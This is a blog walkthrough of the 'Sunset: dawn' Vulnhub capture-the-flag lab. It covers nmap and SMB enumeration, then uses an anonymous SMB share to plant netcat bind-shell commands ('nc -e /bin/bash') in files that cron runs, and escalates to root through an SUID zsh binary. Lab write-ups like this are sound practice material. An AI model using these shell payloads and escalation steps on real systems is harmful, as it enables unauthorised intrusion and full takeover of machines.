Sunset: dawn Vulnhub Walkthrough


Today we are going to solve another CTF challenge called “Sunset: dawn”. It is available on Vulnhub for the purpose of Penetration Testing practices. This is a box from the Sunset series. The credit for making this lab goes to “whitecr0wz”. Let’s start and learn how to successfully breach it.
Level: Intermediate
Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this link.

Penetration Testing Methodology
Network Scanning
·        Netdiscover
·        Nmap
Enumeration
·        Browsing HTTP Service
·        Performing Directory Bruteforce
·        Enumerating log files
·        Enumerating SMB using Enum4linux
Exploiting
·        Connecting via SMB
·        Sending files with netcat invocation
Privilege Escalation
·        SUID bit on zsh

Capture the flag

Walkthrough

Network Scanning
We will be running this lab in a Virtual Machine Player or Virtual Box.  After running the lab, we used the netdiscover command to check the IP Address of the lab.

netdiscover
This was found out to be 192.168.1.165.



Now we will run an aggressive port scan using nmap to gain the information about the open ports and the services running on the target machine.
nmap -A 192.168.1.165
We learned from the scan that we have the port 80 open which is hosting Apache httpd service, and we have the port 139,445,3306 open. This tells us that we have the NetBIOS and MySQL service running on the target machine respectively.



Enumeration
Since we got the port 80 open, we decided to browser the IP Address in the browser. We were given an unavailable error as shown in the given image.



We also started a Directory Bruteforce in order to enumerate the machine further. This gave us a directory called “logs” as shown in the given image.
dirb http://192.168.1.165/



Upon finding the logs directory, we opened the URL in our browser. This gave us a bunch of different log files like auth.log, daemon.log, error.log and management.log. We tried to access the all those log files but we got forbidden message in all except management.log.



So, we downloaded the management.log and used cat command to open the management.log on our attacker machine (Kali Linux). Here we see that we have a directory named “ITDEPT”. It contains two files namely product-control and web-control. As these files were mentioned with cron, we can safely say that these files are getting executed by some background task.
cd Downloads
cat management.log



Back to the nmap port scan, we found that the there is a NetBIOS SMB. Its time to enumerate this machine’s SMB Service. There are multiple ways to do this about which you can learn from here. Here we decided to use the Enum4Linux script. This shows that we have the ITDEPT directory we found earlier. This means this directory is accessible through SMB.
enum4linux -a 192.168.1.165



Also, as we explored the result of Enum4Linux, we saw that we have two users namely, “dawn” and” ganimedes”.



Exploitation
Since, we found the ITDEPT directory in our enumeration. We tried to access it using the SMB as shown in the image. We gave a blank password to login. Upon logging in we ran the ls command. We found nothing in it. We ran the ls command again with the -al parameters to see if we missed any hidden files but we couldn’t find any.
smbclient //192.168.1.165/ITDEPT
ls
ls -al



But this doesn’t mean that we cannot create any file in it. We went back to our terminal and created the files by the name of “product-control” and “web-control”. We created the files by this name because earlier while enumerating the management.log file we saw that files with this name were executed after some time again and again using cron. We also entered the netcat shell invocation script in those files using the echo command as well.
echo “nc -e /bin/bash -lvp 1234 &” > product-control
echo “nc -e /bin/bash -lvp 1234 &” > web-control
ls



Now back to the SMB shell, we transferred the files that we just created to the target system using put command. Both the files were successfully transferred. After the transfer, we ran the ls command to check whether the files were indeed on the system or not. As seen in the image given below, we have put our files on the target system. 
put product-control
put web-control
ls



Now, we went back to our browser, to see the log directory. From there we downloaded the management.log file again. We did this as if those files we just created were executed or not. As show in the image, the files were successfully executed by the cron on the target system.



Now we ran the netcat to get this session on the target machine. We get our shell through netcat. This was an improper shell. So, we used the python one-liner to convert this into a proper shell. On conversion we saw that the shell we got was of user dawn.
nc 192.168.1.165 1234
python -c ‘import pty;pty.spawn(“/bin/bash”)’
Privilege Escalation
Now that we had a shell, it was regular practice to check for any file having SUID permissions with the help of Find command. By using the following command, we enumerated all binaries having SUID permissions:
find / -perm -u=s -type f 2>/dev/null
whoami
/usr/bin/zsh
whoami
cd /root
ls
cat flag.txt
The Find command gave us that the zsh command can help us escalate privilege on this machine. We ran the zsh command and checked our status using the whoami command. We got root. Now it was time to enumerate for the flag. We traversed into the root directory and found the flag.txt file. This concludes this CTF.



0 comments:

Post a Comment